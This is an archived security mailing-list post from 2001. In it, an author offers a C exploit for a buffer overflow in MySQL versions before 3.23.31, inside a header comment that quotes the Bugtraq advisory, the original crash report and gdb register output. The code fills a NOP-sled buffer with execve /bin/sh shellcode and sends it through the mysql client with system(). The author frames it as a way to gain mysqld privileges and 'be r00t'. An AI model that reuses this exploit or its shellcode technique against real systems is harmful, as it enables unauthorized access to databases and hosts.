Hello...
Here's a exploit for this...
[See attached...]
Regardz,
Lus Miguel Silva aka wC
Member of lonoss.org and unsecurity.org
http://www.lonoss.org/
http://www.unsecurity.org/
http://www.ispgaya.pt/ Student
Personal WebPage at:
http://paginas.ispgaya.pt/~lms/
&&
http://www.unsecurity.org/wC/
Personal Code at:
www.unsecurity.org/wC/MyCode/
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
[EMAIL PROTECTED]
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]
Advisorie:
[from a bugtraq email]
Hi,
all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
server and which seems to be exploitable (ie. 4141414 in eip)
Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)
Requirements :
You need a valid login/password to exploit this
Solution :
Upgrade to 3.23.31
Proof-of-concept code :
None
Credits :
I'm not the discoverer of this bug
The first public report was made by [EMAIL PROTECTED] via the MySQL
mailing-list
See the following mails for details
Regards,
Nicob
Here the original post to the MySQL mailing-list :
==================================================
On Jan 12, Jo?o Gouveia wrote:
> Hi,
>
> I believe i've found a problem in MySql. Here are some test's i've made in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).Confirmed up to latest 3.23
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
></quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal i got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
>
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> [EMAIL PROTECTED]
Here the reponse to a email I send today to the MySQL list :
============================================================
Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei
Here an part of the 3.23.30 to 3.23.31 diff :
=============================================
+Changes in release 3.23.31
+--------------------------
+
+ * Fixed security bug in something (please upgrade if you are using a
+ earlier MySQL 3.23 version).
End of Advisorie
Final Words: Yes..i'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...i just wave everybody :]
*/
#include <stdio.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define RET_ADDR 0x41414141
#define NOP 0x90
// Our EVIL code...
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// Where it all happens...
main(int argc, char *argv[])
{
char *buffer, *ptr, tmp[1500];
long *addr_ptr, addr;
int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;
printf("\nMySQL [all versions < 3.23.31] Local Exploit by [EMAIL PROTECTED]\n\n");
if (argc==2) offset=atoi(argv[1]);
else
printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");
printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
if (!(buffer = malloc(bsize))) {
printf("ERROR!\n");
printf("Couldn't allocate memory...\n");
printf("Exiting...\n");
exit(0);
}
printf("SUCCESS!\n");
addr=RET_ADDR-offset;
printf("Using address : 0x%x\n", addr);
printf("Offset : %d\n",offset);
printf("Buffer Size : %d\n",bsize);
ptr=buffer;
addr_ptr=(long *) ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
for (i=0;i<bsize/2;i++) buffer[i]=NOP;
ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buffer[bsize-1]='\0';
snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
printf("Oh k...i have the evil'buffer right here :P\n");
printf("So...[if all went well], prepare to be r00t...\n");
system(tmp);
}
